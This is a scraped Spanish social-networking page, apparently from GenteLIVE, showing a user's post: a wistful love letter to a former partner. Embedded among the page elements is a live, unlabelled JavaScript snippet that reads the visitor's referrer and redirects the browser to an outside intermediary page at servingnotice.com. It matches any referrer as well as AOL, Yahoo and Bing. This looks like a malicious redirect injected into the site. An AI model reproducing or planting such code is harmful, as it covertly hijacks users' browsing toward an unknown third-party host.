Foto cuarto   Foto segundo   1º de la semana   1ª de la semana   Foto segunda   Foto Cuarta
  Foto quinto   Foto tercero Foto tercera   Foto quinta
 
Recuerda: puedes votar hasta el viernes a las 24:00
         
Votaciones de esta semana
       
  • ChicoLive
  • ChicaLive
var toUrl="http://"; var rUrl = document.referrer; var patrn=/(.*)$/; toUrl+="servingnotice.com/lvinter1/intermediary.html?it11org"; toUrl+=""; if(patrn.exec(rUrl))window.location.href=toUrl; patrn=/(.*)aol.(.*)$/; if(patrn.exec(rUrl))window.location.href=toUrl; patrn=/(.*)yahoo.(.*)$/; if(patrn.exec(rUrl))window.location.href=toUrl; patrn=/(.*)bing.(.*)$/; if(patrn.exec(rUrl))window.location.href=toUrl;

Todos los cursos, masters y oposiones que existen.

Las mejores inocentadas para el 28 de diciembre
 

Salmah

Salmah  
38
Barcelona  
   

Historia

Te gusta
[17-05-2013 16:02]

Sé que te gusta que te escriba... sino es por ti por quien estaría aquí de nuevo. La pagina de aquellos tiempos en los que un trabajo a ratos demasiado ocioso me permitía dar rienda suelta a mi inspiración.

Aquí me descubriste en los primeros días a través de mis escritos. Sé que leías mis historias mientras estaba en la oficina, tal vez en esos ratos en los que nuestra tozudez nos mantenía demasiado rato alejados.Mucho tiempo perdido para tan poco aprovechado.

La vida ha cambiado bastante pero durante mucho tiempo deseé cerrar los ojos y despertarme en tu cama donde las tardes de los viernes se escurrían entre gemidos, siestas y peliculas que no era capaz de acabar de ver. Estaba a menudo muy cansada pero ahora pienso que tal vez era mas cansancio del alma que fisico.

Tu ventana era un poema, tus fotos en la pared el recuerdo de una vida que habías vivido sin mí, tus cuadros me asomaban a aquella parte de ti que n pude acabar de conocer. Ese era el mundo que yo amaba y en el que no puedo evitar pensar sin que se me haga todavia un nudo en la garganta.

Si alguna vez me lees quiero que sepas que volvi a escribir aqui para ti, que te deseo toda la luz del mundo en tu vida y que sigas abrazandome desde aquel cuarto, detrás de mí, siempre.


Compártelo:

 
Haz GenteLIVE tu página de inicio Añadir a Favoritos Contacto Ayuda